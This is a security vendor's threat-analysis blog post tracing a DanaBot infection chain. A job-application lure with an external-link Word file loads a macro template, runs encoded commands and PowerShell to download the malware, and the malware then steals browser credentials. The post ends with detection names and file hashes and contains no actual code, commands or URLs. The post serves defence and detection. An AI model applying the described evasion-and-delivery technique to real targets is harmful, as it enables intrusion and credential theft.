Distribution of DanaBot Malware Detected by AhnLab EDR via Word Files

There are two types of malicious documents that are distributed via email recently: those exploiting equation editor and those including external link URLs. This post will describe the infection flow of the DanaBot malware that is distributed through documents containing external links, the latter method, as well as the evidence and detection process with the AhnLab EDR product’s diagram.  Figure 1 shows the content of a spam email with a Word document attached that contains an external link. As you can see, it is a sophisticatedly disguised email pretending to be a job application form to deceive the recipient. The attached file (.docx) is a Word document that contains an external link.

Figure 1. The email with a malicious document attached

Figure 2 depicts the EDR evidence of the PC that opened the email and executed the attachment. The screen shows that a document file (.docx) was created and executed through the Outlook (outlook.exe) process. The diagram depicts suspicious process tree sequence starting from Outlook (outlook.exe), followed by Word (winword.exe), command prompt (cmd.exe), PowerShell (powershell.exe), and then an executable file iu4t4.exe to rundll32.exe.

Figure 2. A malicious Word document (.docx) generated from outlook.exe

Figure 3 shows the external link inside the attached Word file (.docx). Through this mechanism, executing the Word file (.docx) will connect to the specified address to download additional documents and load them. Figure 4 shows the macro document (w1p3nx.dotm) downloaded and loaded via the external connection upon opening the Word file (.docx). As shown in Figure 5, the EDR diagram confirms that the additional document (w1p3nx.dotm) is downloaded and loaded from the WINWORD.EXE process which runs the Word file.

Figure 3. A feature in the attached malicious Word document (downloading w1p3nx.dotm through an external link address)
Figure 4. A macro document (w1p3nx.dotm) loaded through the Word file (.docx)
Figure 5. EDR diagram (evidence of w1p3nx.dotm being created and executed)

Figure 6 shows the macro code included in the additionally downloaded macro document (w1p4nx.dotm). The code decodes and executes the encoded CMD commands. The EDR diagram in Figure 7 confirms the existence of the decoded commands and reveals a PowerShell command to download the DanaBot malware (iu4t4.exe) from the C2.

Figure 6. The macro code feature of w1p4nx.dotm (executes encoded CMD commands)
Figure 7. EDR diagram (confirms the existence of the decoded CMD command that downloads an EXE file)

Figure 8 shows the DanaBot malware (iu4t4.exe) created in the download path (C:UsersPublic), while Figure 9 depicts evidence in the EDR diagram confirming the creation of DanaBot via PowerShell.

Figure 8. The downloaded EXE file (DanaBot malware)
Figure 9. EDR diagram (evidence of the DanaBot malware EXE file’s creation)

Figure 10 shows how the executed DanaBot malware (iu4t4.exe) re-launches itself with shell32.dll’s parameters through rundll32.exe. Therefore, it is operating within shell32.dll, the acting process being rundll32.exe.

Figure 10. EDR diagram (self-injection and re-launch through rundll32.exe)

DanaBot malware [1] has the capabilities to steal various data from the PC upon infection and can collect information without being connected to the C2. The behavior evidence of rundll32.exe in the EDR diagram (see Figure 11) shows that the malware takes screenshots and collects PC information and browser account credentials.

Figure 11. EDR diagram (taking screenshots and exfiltrating PC information and browser account credentials)

This article described the infection flow of the DanaBot malware being spread via documents containing external links and its behavioral evidence tracked by the EDR product in a diagram. The attacker employed a document containing an external link to prevent their malicious macro from being detected in an attachment. The email distributing the malware is also sophisticatedly disguised as an ordinary job application form to deceive the recipient into opening the document. It is essential to exercise caution when opening attachments and ensure that there is no extension present that is capable of executing malware. Additionally, continuous monitoring using security products is crucial for detecting and controlling unauthorized access from threat actors.

[Behavior Detection]
Execution/MDP.Scripting.M10747
Execution/EDR.Malware.M10459

[File Detection]
Downloader/XML.External
Downloader/DOC.Generic.S2503
Trojan/Win.DANABOT.C5608053

[IOCs]
0bb0ae135c2f4ec39e93dcf66027604d (.DOCX)
28fd189dc70f5bab649e8a267407ae85 (.DOTM)
e29e4a6c31bd79d90ab2b89f57075312 (Danabot EXE)

AhnLab EDR protects the endpoint environment by delivering behavioral detection, advanced analysis, holistic visibility, and proactive threat hunting. For more information about the product, please visit our official website.

The post Distribution of DanaBot Malware via Word Files Detected by AhnLab EDR appeared first on ASEC BLOG.